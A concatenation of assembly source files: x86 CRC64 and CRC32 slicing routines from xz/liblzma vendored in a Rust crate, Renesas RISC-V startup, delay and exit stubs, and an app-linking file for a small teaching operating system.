// ECMA-182
static const uint64_t poly64 = UINT64_C(0xC96C5795D7870F42);
for (size_t s = 0; s < 4; ++s) {
for (size_t b = 0; b < 256; ++b) {
uint64_t r = s == 0 ? b : lzma_crc64_table[s - 1][b];
for (size_t i = 0; i < 8; ++i) {
if (r & 1)
r = (r >> 1) ^ poly64;
else
r >>= 1;
}
lzma_crc64_table[s][b] = r;
}
}
}
* The prototype of the CRC64 function:
* extern uint64_t lzma_crc64(const uint8_t *buf, size_t size, uint64_t crc);
*/
/*
* On some systems, the functions need to be prefixed. The prefix is
* usually an underscore.
*/
#ifndef __USER_LABEL_PREFIX__
# define __USER_LABEL_PREFIX__
#endif
#define MAKE_SYM_CAT(prefix, sym) prefix ## sym
#define MAKE_SYM(prefix, sym) MAKE_SYM_CAT(prefix, sym)
#define LZMA_CRC64 MAKE_SYM(__USER_LABEL_PREFIX__, lzma_crc64)
#define LZMA_CRC64_TABLE MAKE_SYM(__USER_LABEL_PREFIX__, lzma_crc64_table)
/*
* Solaris assembler doesn't have .p2align, and Darwin uses .align
* differently than GNU/Linux and Solaris.
*/
#if defined(__APPLE__) || defined(__MSDOS__)
# define ALIGN(pow2, abs) .align pow2
#else
# define ALIGN(pow2, abs) .align abs
#endif
.text
.globl LZMA_CRC64
#if !defined(__APPLE__) && !defined(_WIN32) && !defined(__CYGWIN__) \
&& !defined(__MSDOS__)
.type LZMA_CRC64, @function
#endif
ALIGN(4, 16)
LZMA_CRC64:
/*
* Register usage:
* %eax crc LSB
* %edx crc MSB
* %esi buf
* %edi size or buf + size
* %ebx lzma_crc64_table
* %ebp Table index
* %ecx Temporary
*/
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl 0x14(%esp), %esi /* buf */
movl 0x18(%esp), %edi /* size */
movl 0x1C(%esp), %eax /* crc LSB */
movl 0x20(%esp), %edx /* crc MSB */
/*
* Store the address of lzma_crc64_table to %ebx. This is needed to
* get position-independent code (PIC).
*
* The PIC macro is defined by libtool, while __PIC__ is defined
* by GCC but only on some systems. Testing for both makes it simpler
* to test this code without libtool, and keeps the code working also
* when built with libtool but using something else than GCC.
*
* I understood that libtool may define PIC on Windows even though
* the code in Windows DLLs is not PIC in sense that it is in ELF
* binaries, so we need a separate check to always use the non-PIC
* code on Windows.
*/
#if (!defined(PIC) && !defined(__PIC__)) \
|| (defined(_WIN32) || defined(__CYGWIN__))
/* Not PIC */
movl $ LZMA_CRC64_TABLE, %ebx
#elif defined(__APPLE__)
/* Mach-O */
call .L_get_pc
.L_pic:
leal .L_lzma_crc64_table$non_lazy_ptr-.L_pic(%ebx), %ebx
movl (%ebx), %ebx
#else
/* ELF */
call .L_get_pc
addl $_GLOBAL_OFFSET_TABLE_, %ebx
movl LZMA_CRC64_TABLE@GOT(%ebx), %ebx
#endif
/* Complement the initial value. */
notl %eax
notl %edx
.L_align:
/*
* Check if there is enough input to use slicing-by-four.
* We need eight bytes, because the loop pre-reads four bytes.
*/
cmpl $8, %edi
jb .L_rest
/* Check if we have reached alignment of four bytes. */
testl $3, %esi
jz .L_slice
/* Calculate CRC of the next input byte. */
movzbl (%esi), %ebp
incl %esi
movzbl %al, %ecx
xorl %ecx, %ebp
shrdl $8, %edx, %eax
xorl (%ebx, %ebp, 8), %eax
shrl $8, %edx
xorl 4(%ebx, %ebp, 8), %edx
decl %edi
jmp .L_align
.L_slice:
/*
* If we get here, there's at least eight bytes of aligned input
* available. Make %edi multiple of four bytes. Store the possible
* remainder over the "size" variable in the argument stack.
*/
movl %edi, 0x18(%esp)
andl $-4, %edi
subl %edi, 0x18(%esp)
/*
* Let %edi be buf + size - 4 while running the main loop. This way
* we can compare for equality to determine when exit the loop.
*/
addl %esi, %edi
subl $4, %edi
/* Read in the first four aligned bytes. */
movl (%esi), %ecx
.L_loop:
xorl %eax, %ecx
movzbl %cl, %ebp
movl 0x1800(%ebx, %ebp, 8), %eax
xorl %edx, %eax
movl 0x1804(%ebx, %ebp, 8), %edx
movzbl %ch, %ebp
xorl 0x1000(%ebx, %ebp, 8), %eax
xorl 0x1004(%ebx, %ebp, 8), %edx
shrl $16, %ecx
movzbl %cl, %ebp
xorl 0x0800(%ebx, %ebp, 8), %eax
xorl 0x0804(%ebx, %ebp, 8), %edx
movzbl %ch, %ebp
addl $4, %esi
xorl (%ebx, %ebp, 8), %eax
xorl 4(%ebx, %ebp, 8), %edx
/* Check for end of aligned input. */
cmpl %edi, %esi
/*
* Copy the next input byte to %ecx. It is slightly faster to
* read it here than at the top of the loop.
*/
movl (%esi), %ecx
jb .L_loop
/*
* Process the remaining four bytes, which we have already
* copied to %ecx.
*/
xorl %eax, %ecx
movzbl %cl, %ebp
movl 0x1800(%ebx, %ebp, 8), %eax
xorl %edx, %eax
movl 0x1804(%ebx, %ebp, 8), %edx
movzbl %ch, %ebp
xorl 0x1000(%ebx, %ebp, 8), %eax
xorl 0x1004(%ebx, %ebp, 8), %edx
shrl $16, %ecx
movzbl %cl, %ebp
xorl 0x0800(%ebx, %ebp, 8), %eax
xorl 0x0804(%ebx, %ebp, 8), %edx
movzbl %ch, %ebp
addl $4, %esi
xorl (%ebx, %ebp, 8), %eax
xorl 4(%ebx, %ebp, 8), %edx
/* Copy the number of remaining bytes to %edi. */
movl 0x18(%esp), %edi
.L_rest:
/* Check for end of input. */
testl %edi, %edi
jz .L_return
/* Calculate CRC of the next input byte. */
movzbl (%esi), %ebp
incl %esi
movzbl %al, %ecx
xorl %ecx, %ebp
shrdl $8, %edx, %eax
xorl (%ebx, %ebp, 8), %eax
shrl $8, %edx
xorl 4(%ebx, %ebp, 8), %edx
decl %edi
jmp .L_rest
.L_return:
/* Complement the final value. */
notl %eax
notl %edx
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
#if defined(PIC) || defined(__PIC__)
ALIGN(4, 16)
.L_get_pc:
movl (%esp), %ebx
ret
#endif
#if defined(__APPLE__) && (defined(PIC) || defined(__PIC__))
/* Mach-O PIC */
.section __IMPORT,__pointers,non_lazy_symbol_pointers
.L_lzma_crc64_table$non_lazy_ptr:
.indirect_symbol LZMA_CRC64_TABLE
.long 0
#elif defined(_WIN32) || defined(__CYGWIN__)
# ifdef DLL_EXPORT
/* This is equivalent of __declspec(dllexport). */
.section .drectve
.ascii " -export:lzma_crc64"
# endif
#elif !defined(__MSDOS__)
/* ELF */
.size LZMA_CRC64, .-LZMA_CRC64
#endif
/*
* This is needed to support non-executable stack. It's ugly to
* use __linux__ here, but I don't know a way to detect when
* we are using GNU assembler.
*/
#if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",@progbits
#endif
|
mi2bjss/Pressel-site | 7,228 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/lzma-sys-0.1.20/xz-5.2/src/liblzma/check/crc32_x86.S | /*
* Speed-optimized CRC32 using slicing-by-eight algorithm
*
* This uses only i386 instructions, but it is optimized for i686 and later
* (including e.g. Pentium II/III/IV, Athlon XP, and Core 2). For i586
* (e.g. Pentium), slicing-by-four would be better, and even the C version
* of slicing-by-eight built with gcc -march=i586 tends to be a little bit
* better than this. Very few probably run this code on i586 or older x86
* so this shouldn't be a problem in practice.
*
* Authors: Igor Pavlov (original version)
* Lasse Collin (AT&T syntax, PIC support, better portability)
*
* This file has been put into the public domain.
* You can do whatever you want with this file.
*
* This code needs lzma_crc32_table, which can be created using the
* following C code:
uint32_t lzma_crc32_table[8][256];
void
init_table(void)
{
// IEEE-802.3
static const uint32_t poly32 = UINT32_C(0xEDB88320);
// Castagnoli
// static const uint32_t poly32 = UINT32_C(0x82F63B78);
// Koopman
// static const uint32_t poly32 = UINT32_C(0xEB31D82E);
for (size_t s = 0; s < 8; ++s) {
for (size_t b = 0; b < 256; ++b) {
uint32_t r = s == 0 ? b : lzma_crc32_table[s - 1][b];
for (size_t i = 0; i < 8; ++i) {
if (r & 1)
r = (r >> 1) ^ poly32;
else
r >>= 1;
}
lzma_crc32_table[s][b] = r;
}
}
}
* The prototype of the CRC32 function:
* extern uint32_t lzma_crc32(const uint8_t *buf, size_t size, uint32_t crc);
*/
/*
* On some systems, the functions need to be prefixed. The prefix is
* usually an underscore.
*/
#ifndef __USER_LABEL_PREFIX__
# define __USER_LABEL_PREFIX__
#endif
#define MAKE_SYM_CAT(prefix, sym) prefix ## sym
#define MAKE_SYM(prefix, sym) MAKE_SYM_CAT(prefix, sym)
#define LZMA_CRC32 MAKE_SYM(__USER_LABEL_PREFIX__, lzma_crc32)
#define LZMA_CRC32_TABLE MAKE_SYM(__USER_LABEL_PREFIX__, lzma_crc32_table)
/*
* Solaris assembler doesn't have .p2align, and Darwin uses .align
* differently than GNU/Linux and Solaris.
*/
#if defined(__APPLE__) || defined(__MSDOS__)
# define ALIGN(pow2, abs) .align pow2
#else
# define ALIGN(pow2, abs) .align abs
#endif
.text
.globl LZMA_CRC32
#if !defined(__APPLE__) && !defined(_WIN32) && !defined(__CYGWIN__) \
&& !defined(__MSDOS__)
.type LZMA_CRC32, @function
#endif
ALIGN(4, 16)
LZMA_CRC32:
/*
* Register usage:
* %eax crc
* %esi buf
* %edi size or buf + size
* %ebx lzma_crc32_table
* %ebp Table index
* %ecx Temporary
* %edx Temporary
*/
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl 0x14(%esp), %esi /* buf */
movl 0x18(%esp), %edi /* size */
movl 0x1C(%esp), %eax /* crc */
/*
* Store the address of lzma_crc32_table to %ebx. This is needed to
* get position-independent code (PIC).
*
* The PIC macro is defined by libtool, while __PIC__ is defined
* by GCC but only on some systems. Testing for both makes it simpler
* to test this code without libtool, and keeps the code working also
* when built with libtool but using something else than GCC.
*
* I understood that libtool may define PIC on Windows even though
* the code in Windows DLLs is not PIC in sense that it is in ELF
* binaries, so we need a separate check to always use the non-PIC
* code on Windows.
*/
#if (!defined(PIC) && !defined(__PIC__)) \
|| (defined(_WIN32) || defined(__CYGWIN__))
/* Not PIC */
movl $ LZMA_CRC32_TABLE, %ebx
#elif defined(__APPLE__)
/* Mach-O */
call .L_get_pc
.L_pic:
leal .L_lzma_crc32_table$non_lazy_ptr-.L_pic(%ebx), %ebx
movl (%ebx), %ebx
#else
/* ELF */
call .L_get_pc
addl $_GLOBAL_OFFSET_TABLE_, %ebx
movl LZMA_CRC32_TABLE@GOT(%ebx), %ebx
#endif
/* Complement the initial value. */
notl %eax
ALIGN(4, 16)
.L_align:
/*
* Check if there is enough input to use slicing-by-eight.
* We need 16 bytes, because the loop pre-reads eight bytes.
*/
cmpl $16, %edi
jb .L_rest
/* Check if we have reached alignment of eight bytes. */
testl $7, %esi
jz .L_slice
/* Calculate CRC of the next input byte. */
movzbl (%esi), %ebp
incl %esi
movzbl %al, %ecx
xorl %ecx, %ebp
shrl $8, %eax
xorl (%ebx, %ebp, 4), %eax
decl %edi
jmp .L_align
ALIGN(2, 4)
.L_slice:
/*
* If we get here, there's at least 16 bytes of aligned input
* available. Make %edi multiple of eight bytes. Store the possible
* remainder over the "size" variable in the argument stack.
*/
movl %edi, 0x18(%esp)
andl $-8, %edi
subl %edi, 0x18(%esp)
/*
* Let %edi be buf + size - 8 while running the main loop. This way
* we can compare for equality to determine when exit the loop.
*/
addl %esi, %edi
subl $8, %edi
/* Read in the first eight aligned bytes. */
xorl (%esi), %eax
movl 4(%esi), %ecx
movzbl %cl, %ebp
.L_loop:
movl 0x0C00(%ebx, %ebp, 4), %edx
movzbl %ch, %ebp
xorl 0x0800(%ebx, %ebp, 4), %edx
shrl $16, %ecx
xorl 8(%esi), %edx
movzbl %cl, %ebp
xorl 0x0400(%ebx, %ebp, 4), %edx
movzbl %ch, %ebp
xorl (%ebx, %ebp, 4), %edx
movzbl %al, %ebp
/*
* Read the next four bytes, for which the CRC is calculated
* on the next interation of the loop.
*/
movl 12(%esi), %ecx
xorl 0x1C00(%ebx, %ebp, 4), %edx
movzbl %ah, %ebp
shrl $16, %eax
xorl 0x1800(%ebx, %ebp, 4), %edx
movzbl %ah, %ebp
movzbl %al, %eax
movl 0x1400(%ebx, %eax, 4), %eax
addl $8, %esi
xorl %edx, %eax
xorl 0x1000(%ebx, %ebp, 4), %eax
/* Check for end of aligned input. */
cmpl %edi, %esi
movzbl %cl, %ebp
jne .L_loop
/*
* Process the remaining eight bytes, which we have already
* copied to %ecx and %edx.
*/
movl 0x0C00(%ebx, %ebp, 4), %edx
movzbl %ch, %ebp
xorl 0x0800(%ebx, %ebp, 4), %edx
shrl $16, %ecx
movzbl %cl, %ebp
xorl 0x0400(%ebx, %ebp, 4), %edx
movzbl %ch, %ebp
xorl (%ebx, %ebp, 4), %edx
movzbl %al, %ebp
xorl 0x1C00(%ebx, %ebp, 4), %edx
movzbl %ah, %ebp
shrl $16, %eax
xorl 0x1800(%ebx, %ebp, 4), %edx
movzbl %ah, %ebp
movzbl %al, %eax
movl 0x1400(%ebx, %eax, 4), %eax
addl $8, %esi
xorl %edx, %eax
xorl 0x1000(%ebx, %ebp, 4), %eax
/* Copy the number of remaining bytes to %edi. */
movl 0x18(%esp), %edi
.L_rest:
/* Check for end of input. */
testl %edi, %edi
jz .L_return
/* Calculate CRC of the next input byte. */
movzbl (%esi), %ebp
incl %esi
movzbl %al, %ecx
xorl %ecx, %ebp
shrl $8, %eax
xorl (%ebx, %ebp, 4), %eax
decl %edi
jmp .L_rest
.L_return:
/* Complement the final value. */
notl %eax
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
#if defined(PIC) || defined(__PIC__)
ALIGN(4, 16)
.L_get_pc:
movl (%esp), %ebx
ret
#endif
#if defined(__APPLE__) && (defined(PIC) || defined(__PIC__))
/* Mach-O PIC */
.section __IMPORT,__pointers,non_lazy_symbol_pointers
.L_lzma_crc32_table$non_lazy_ptr:
.indirect_symbol LZMA_CRC32_TABLE
.long 0
#elif defined(_WIN32) || defined(__CYGWIN__)
# ifdef DLL_EXPORT
/* This is equivalent of __declspec(dllexport). */
.section .drectve
.ascii " -export:lzma_crc32"
# endif
#elif !defined(__MSDOS__)
/* ELF */
.size LZMA_CRC32, .-LZMA_CRC32
#endif
/*
* This is needed to support non-executable stack. It's ugly to
* use __linux__ here, but I don't know a way to detect when
* we are using GNU assembler.
*/
#if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",@progbits
#endif
|
MikelB03/TFM_Mikel_Barrena | 4,085 | RISC-V/R9A02G021_c/src/smc_gen/r_bsp/mcu/all/start.s | ;;/***********************************************************************************************************************
;;* DISCLAIMER
;;* This software is supplied by Renesas Electronics Corporation and is only intended for use with Renesas products. No
;;* other uses are authorized. This software is owned by Renesas Electronics Corporation and is protected under all
;;* applicable laws, including copyright laws.
;;* THIS SOFTWARE IS PROVIDED "AS IS" AND RENESAS MAKES NO WARRANTIES REGARDING
;;* THIS SOFTWARE, WHETHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY,
;;* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. ALL SUCH WARRANTIES ARE EXPRESSLY DISCLAIMED. TO THE MAXIMUM
;;* EXTENT PERMITTED NOT PROHIBITED BY LAW, NEITHER RENESAS ELECTRONICS CORPORATION NOR ANY OF ITS AFFILIATED COMPANIES
;;* SHALL BE LIABLE FOR ANY DIRECT, INDIRECT, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES FOR ANY REASON RELATED TO THIS
;;* SOFTWARE, EVEN IF RENESAS OR ITS AFFILIATES HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
;;* Renesas reserves the right, without notice, to make changes to this software and to discontinue the availability of
;;* this software. By using this software, you agree to the additional terms and conditions found by accessing the
;;* following link:
;;* http://www.renesas.com/disclaimer
;;*
;;* Copyright (C) 2024 Renesas Electronics Corporation. All rights reserved.
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* File Name : start.S
;;* Description :
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* History : DD.MM.YYYY Version Description
;;* : 20.01.2024 1.00 First Release
;; : 29.03.2024 1.10 Add code to init the data segment for ECC
;;***********************************************************************************************************************/
/*reset_program.asm*/
.extern initialize_vect
.text
.global _PowerON_Reset /*! global Start routine */
.type _PowerON_Reset, @function
/* call to _PowerON_Reset */
_PowerON_Reset:
# Initialize global pointer
.option push
.option norelax
1:
auipc gp, %pcrel_hi(__global_pointer$)
addi gp, gp, %pcrel_lo(1b)
.option pop
# initialize the stack and frame pointers
la sp, __stack
add s0, sp, zero
# Initialize vect
call initialize_vect
# Call bsp_init_system() function - clock setup
call bsp_init_system
# Clear the bss segment
la a0, __bss
la a2, __ebss
sub a2, a2, a0
li a1, 0
call memset
# Init the data segment
la a0, __datastart
la a1, __romdatastart
la a2, __romdatacopysize
call memcpy
# Init the data segment for ECC
la a0, __dataeccramstart
la a1, __romdataeccramstart
la a2, __romdataeccramcopysize
call memcpy
# Call bsp_init_hardware() function - hardware setup
call bsp_init_hardware
# Make reference to atexit weak to avoid unconditionally pulling in
# support code. Refer to comments in __atexit.c for more details.
.weak atexit
la a0, atexit
beqz a0, .Lweak_atexit
.weak __libc_fini_array
la a0, __libc_fini_array # Register global termination functions
call atexit # to be called upon exit
.Lweak_atexit:
call __libc_init_array # Run global initialization functions
li a0, 0 # a0 = argc
li a1, 0 # a1 = argv
li a2, 0 # a2 = envp = NULL
call main
tail exit
.size _PowerON_Reset, .-_PowerON_Reset
|
MikelB03/TFM_Mikel_Barrena | 2,545 | RISC-V/R9A02G021_c/src/smc_gen/r_bsp/mcu/all/r_bsp_common_llvm.s | ;;/***********************************************************************************************************************
;;* DISCLAIMER
;;* This software is supplied by Renesas Electronics Corporation and is only intended for use with Renesas products. No
;;* other uses are authorized. This software is owned by Renesas Electronics Corporation and is protected under all
;;* applicable laws, including copyright laws.
;;* THIS SOFTWARE IS PROVIDED "AS IS" AND RENESAS MAKES NO WARRANTIES REGARDING
;;* THIS SOFTWARE, WHETHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY,
;;* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. ALL SUCH WARRANTIES ARE EXPRESSLY DISCLAIMED. TO THE MAXIMUM
;;* EXTENT PERMITTED NOT PROHIBITED BY LAW, NEITHER RENESAS ELECTRONICS CORPORATION NOR ANY OF ITS AFFILIATED COMPANIES
;;* SHALL BE LIABLE FOR ANY DIRECT, INDIRECT, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES FOR ANY REASON RELATED TO THIS
;;* SOFTWARE, EVEN IF RENESAS OR ITS AFFILIATES HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
;;* Renesas reserves the right, without notice, to make changes to this software and to discontinue the availability of
;;* this software. By using this software, you agree to the additional terms and conditions found by accessing the
;;* following link:
;;* http://www.renesas.com/disclaimer
;;*
;;* Copyright (C) 2024 Renesas Electronics Corporation. All rights reserved.
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* File Name : r_bsp_common_llvm.s
;;* Description :
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* History : DD.MM.YYYY Version Description
;;* : 20.01.2024 1.00 First Release
;;***********************************************************************************************************************/
.globl _delay_wait /*! global delay wait routine */
;;/****************************************************************************
;;* delay_wait
;;****************************************************************************/
_delay_wait:
loop:
addi a0, a0, -1
bnez a0, loop
_exit:
ret
|
MikelB03/TFM_Mikel_Barrena | 2,451 | RISC-V/R9A02G021_c/src/smc_gen/r_bsp/mcu/all/exit.s | ;;/***********************************************************************************************************************
;;* DISCLAIMER
;;* This software is supplied by Renesas Electronics Corporation and is only intended for use with Renesas products. No
;;* other uses are authorized. This software is owned by Renesas Electronics Corporation and is protected under all
;;* applicable laws, including copyright laws.
;;* THIS SOFTWARE IS PROVIDED "AS IS" AND RENESAS MAKES NO WARRANTIES REGARDING
;;* THIS SOFTWARE, WHETHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY,
;;* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. ALL SUCH WARRANTIES ARE EXPRESSLY DISCLAIMED. TO THE MAXIMUM
;;* EXTENT PERMITTED NOT PROHIBITED BY LAW, NEITHER RENESAS ELECTRONICS CORPORATION NOR ANY OF ITS AFFILIATED COMPANIES
;;* SHALL BE LIABLE FOR ANY DIRECT, INDIRECT, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES FOR ANY REASON RELATED TO THIS
;;* SOFTWARE, EVEN IF RENESAS OR ITS AFFILIATES HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
;;* Renesas reserves the right, without notice, to make changes to this software and to discontinue the availability of
;;* this software. By using this software, you agree to the additional terms and conditions found by accessing the
;;* following link:
;;* http://www.renesas.com/disclaimer
;;*
;;* Copyright (C) 2024 Renesas Electronics Corporation. All rights reserved.
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* File Name : exit.s
;;* Description :
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* History : DD.MM.YYYY Version Description
;;* : 20.01.2024 1.00 First Release
;;***********************************************************************************************************************/
.global _exit
.type _exit, @function
_exit:
# exit with the return code on the qemu virt machine
lui t0, 0x100
slli a0, a0, 12
addi a0, a0, 0x333
slli a0, a0, 4
addi a0, a0, 0x3
sw a0, 0(t0)
|
MikelB03/TFM_Mikel_Barrena | 4,085 | RISC-V/R9A02G021_fromScilab/src/smc_gen/r_bsp/mcu/all/start.s | ;;/***********************************************************************************************************************
;;* DISCLAIMER
;;* This software is supplied by Renesas Electronics Corporation and is only intended for use with Renesas products. No
;;* other uses are authorized. This software is owned by Renesas Electronics Corporation and is protected under all
;;* applicable laws, including copyright laws.
;;* THIS SOFTWARE IS PROVIDED "AS IS" AND RENESAS MAKES NO WARRANTIES REGARDING
;;* THIS SOFTWARE, WHETHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY,
;;* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. ALL SUCH WARRANTIES ARE EXPRESSLY DISCLAIMED. TO THE MAXIMUM
;;* EXTENT PERMITTED NOT PROHIBITED BY LAW, NEITHER RENESAS ELECTRONICS CORPORATION NOR ANY OF ITS AFFILIATED COMPANIES
;;* SHALL BE LIABLE FOR ANY DIRECT, INDIRECT, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES FOR ANY REASON RELATED TO THIS
;;* SOFTWARE, EVEN IF RENESAS OR ITS AFFILIATES HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
;;* Renesas reserves the right, without notice, to make changes to this software and to discontinue the availability of
;;* this software. By using this software, you agree to the additional terms and conditions found by accessing the
;;* following link:
;;* http://www.renesas.com/disclaimer
;;*
;;* Copyright (C) 2024 Renesas Electronics Corporation. All rights reserved.
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* File Name : start.S
;;* Description :
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* History : DD.MM.YYYY Version Description
;;* : 20.01.2024 1.00 First Release
;; : 29.03.2024 1.10 Add code to init the data segment for ECC
;;***********************************************************************************************************************/
/*reset_program.asm*/
.extern initialize_vect
.text
.global _PowerON_Reset /*! global Start routine */
.type _PowerON_Reset, @function
/* call to _PowerON_Reset */
_PowerON_Reset:
# Initialize global pointer
.option push
.option norelax
1:
auipc gp, %pcrel_hi(__global_pointer$)
addi gp, gp, %pcrel_lo(1b)
.option pop
# initialize the stack and frame pointers
la sp, __stack
add s0, sp, zero
# Initialize vect
call initialize_vect
# Call bsp_init_system() function - clock setup
call bsp_init_system
# Clear the bss segment
la a0, __bss
la a2, __ebss
sub a2, a2, a0
li a1, 0
call memset
# Init the data segment
la a0, __datastart
la a1, __romdatastart
la a2, __romdatacopysize
call memcpy
# Init the data segment for ECC
la a0, __dataeccramstart
la a1, __romdataeccramstart
la a2, __romdataeccramcopysize
call memcpy
# Call bsp_init_hardware() function - hardware setup
call bsp_init_hardware
# Make reference to atexit weak to avoid unconditionally pulling in
# support code. Refer to comments in __atexit.c for more details.
.weak atexit
la a0, atexit
beqz a0, .Lweak_atexit
.weak __libc_fini_array
la a0, __libc_fini_array # Register global termination functions
call atexit # to be called upon exit
.Lweak_atexit:
call __libc_init_array # Run global initialization functions
li a0, 0 # a0 = argc
li a1, 0 # a1 = argv
li a2, 0 # a2 = envp = NULL
call main
tail exit
.size _PowerON_Reset, .-_PowerON_Reset
|
MikelB03/TFM_Mikel_Barrena | 2,545 | RISC-V/R9A02G021_fromScilab/src/smc_gen/r_bsp/mcu/all/r_bsp_common_llvm.s | ;;/***********************************************************************************************************************
;;* DISCLAIMER
;;* This software is supplied by Renesas Electronics Corporation and is only intended for use with Renesas products. No
;;* other uses are authorized. This software is owned by Renesas Electronics Corporation and is protected under all
;;* applicable laws, including copyright laws.
;;* THIS SOFTWARE IS PROVIDED "AS IS" AND RENESAS MAKES NO WARRANTIES REGARDING
;;* THIS SOFTWARE, WHETHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY,
;;* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. ALL SUCH WARRANTIES ARE EXPRESSLY DISCLAIMED. TO THE MAXIMUM
;;* EXTENT PERMITTED NOT PROHIBITED BY LAW, NEITHER RENESAS ELECTRONICS CORPORATION NOR ANY OF ITS AFFILIATED COMPANIES
;;* SHALL BE LIABLE FOR ANY DIRECT, INDIRECT, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES FOR ANY REASON RELATED TO THIS
;;* SOFTWARE, EVEN IF RENESAS OR ITS AFFILIATES HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
;;* Renesas reserves the right, without notice, to make changes to this software and to discontinue the availability of
;;* this software. By using this software, you agree to the additional terms and conditions found by accessing the
;;* following link:
;;* http://www.renesas.com/disclaimer
;;*
;;* Copyright (C) 2024 Renesas Electronics Corporation. All rights reserved.
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* File Name : r_bsp_common_llvm.s
;;* Description :
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* History : DD.MM.YYYY Version Description
;;* : 20.01.2024 1.00 First Release
;;***********************************************************************************************************************/
.globl _delay_wait /*! global delay wait routine */
;;/****************************************************************************
;;* delay_wait
;;****************************************************************************/
_delay_wait:
loop:
addi a0, a0, -1
bnez a0, loop
_exit:
ret
|
MikelB03/TFM_Mikel_Barrena | 2,451 | RISC-V/R9A02G021_fromScilab/src/smc_gen/r_bsp/mcu/all/exit.s | ;;/***********************************************************************************************************************
;;* DISCLAIMER
;;* This software is supplied by Renesas Electronics Corporation and is only intended for use with Renesas products. No
;;* other uses are authorized. This software is owned by Renesas Electronics Corporation and is protected under all
;;* applicable laws, including copyright laws.
;;* THIS SOFTWARE IS PROVIDED "AS IS" AND RENESAS MAKES NO WARRANTIES REGARDING
;;* THIS SOFTWARE, WHETHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY,
;;* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. ALL SUCH WARRANTIES ARE EXPRESSLY DISCLAIMED. TO THE MAXIMUM
;;* EXTENT PERMITTED NOT PROHIBITED BY LAW, NEITHER RENESAS ELECTRONICS CORPORATION NOR ANY OF ITS AFFILIATED COMPANIES
;;* SHALL BE LIABLE FOR ANY DIRECT, INDIRECT, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES FOR ANY REASON RELATED TO THIS
;;* SOFTWARE, EVEN IF RENESAS OR ITS AFFILIATES HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
;;* Renesas reserves the right, without notice, to make changes to this software and to discontinue the availability of
;;* this software. By using this software, you agree to the additional terms and conditions found by accessing the
;;* following link:
;;* http://www.renesas.com/disclaimer
;;*
;;* Copyright (C) 2024 Renesas Electronics Corporation. All rights reserved.
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* File Name : exit.s
;;* Description :
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* History : DD.MM.YYYY Version Description
;;* : 20.01.2024 1.00 First Release
;;***********************************************************************************************************************/
.global _exit
.type _exit, @function
_exit:
# exit with the return code on the qemu virt machine
lui t0, 0x100
slli a0, a0, 12
addi a0, a0, 0x333
slli a0, a0, 4
addi a0, a0, 0x3
sw a0, 0(t0)
|
mikotopku/os | 4,414 | src/link_app.S |
.align 3
.section .data
.global _num_app
_num_app:
.quad 19
.quad app_0_start
.quad app_1_start
.quad app_2_start
.quad app_3_start
.quad app_4_start
.quad app_5_start
.quad app_6_start
.quad app_7_start
.quad app_8_start
.quad app_9_start
.quad app_10_start
.quad app_11_start
.quad app_12_start
.quad app_13_start
.quad app_14_start
.quad app_15_start
.quad app_16_start
.quad app_17_start
.quad app_18_start
.quad app_18_end
.global _app_names
_app_names:
.string "exit"
.string "forkexec"
.string "forktest"
.string "forktest2"
.string "forktest_simple"
.string "forktree"
.string "hello_world"
.string "initproc"
.string "matrix"
.string "mem"
.string "sleep"
.string "sleep_simple"
.string "spawntest"
.string "stack_overflow"
.string "stridetest"
.string "user_shell"
.string "usertests"
.string "usertests-simple"
.string "yield"
.section .data
.global app_0_start
.global app_0_end
.align 3
app_0_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/exit"
app_0_end:
.section .data
.global app_1_start
.global app_1_end
.align 3
app_1_start:
